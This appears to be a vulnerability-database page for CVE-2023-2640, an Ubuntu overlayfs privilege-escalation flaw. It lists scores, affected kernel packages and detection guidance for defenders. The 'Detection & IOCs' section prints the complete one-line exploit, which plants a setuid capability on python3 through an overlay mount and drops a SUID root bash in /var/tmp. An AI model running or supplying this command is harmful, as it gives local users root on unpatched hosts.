cbcvebase.
CVE-2023-2640
published 2023-07-26

CVE-2023-2640: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may…

PriorityP179high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
15.78%
96.5th percentile
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.

Affected

31 ranges· showing 25
VendorProductVersion rangeFixed in
canonicalubuntu_linux
debianlinux
ubuntulinux
ubuntulinux-aws
ubuntulinux-aws-5.15
ubuntulinux-aws-fips
ubuntulinux-azure
ubuntulinux-azure-5.15
ubuntulinux-azure-fips
ubuntulinux-fips
ubuntulinux-gcp
ubuntulinux-gcp-5.15
ubuntulinux-gcp-fips
ubuntulinux-gke
ubuntulinux-gkeop
ubuntulinux-hwe-5.15
ubuntulinux-ibm
ubuntulinux-ibm-5.15
ubuntulinux-intel-iot-realtime
ubuntulinux-intel-iotg
ubuntulinux-intel-iotg-5.15
ubuntulinux-kvm
ubuntulinux-lowlatency
ubuntulinux-lowlatency-hwe-5.15
ubuntulinux-nvidia

Detection & IOCsextracted from sources · hover to see the quote

commandunshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
path/var/tmp/bash
  • Detect use of 'unshare' with '-rm' flags combined with overlayfs mount operations (lowerdir/upperdir/workdir) — this is the core primitive of the CVE-2023-2640 one-line exploit.
  • Alert on 'setcap cap_setuid+eip' being called on a copied interpreter binary (e.g., python3) inside a user-created directory — indicates capability-planting via overlayfs copy-up.
  • Monitor for creation of SUID bash binaries in world-writable temp directories (e.g., /var/tmp/bash with permissions -rwsr-xr-x owned by root), which indicates successful privilege escalation.
  • Alert on overlayfs mount operations where files with capabilities (CAP_SYS_ADMIN, CAP_SETUID) in the lower directory are copied to the upper directory — the core mechanism of both CVE-2023-2640 and CVE-2023-32629.
  • On July 28, 2023, a public one-line exploit for CVE-2023-2640 was disclosed via Twitter — monitor threat intel feeds for weaponized PoCs and scan for the exploit pattern in process command lines.
  • CVE-2023-2640 is exploitable when the Ubuntu kernel carries both commit c914c0e27eb0 and the SAUCE patch 'overlayfs: Skip permission checking for trusted.overlayfs.* xattrs' — check kernel version and patch state to identify vulnerable hosts.
  • ·The vulnerability requires the Ubuntu kernel to carry BOTH commit c914c0e27eb0 AND the Ubuntu-specific SAUCE patch for overlayfs xattr permission skipping — vanilla upstream kernels are not affected.
  • ·Containers running on vulnerable Ubuntu hosts are also at risk, not just the host itself — container workloads on Docker and Kubernetes are exploitable under certain conditions.
  • ·The exploit was demonstrated on Ubuntu 22.04.3 LTS running kernel 6.2.0-25-generic — patch assessment should include this specific kernel version.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv7.8HIGH
vulncheck7.8HIGH
vendor_debian7.8LOW
vendor_redhat7.8HIGH
vendor_ubuntu7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.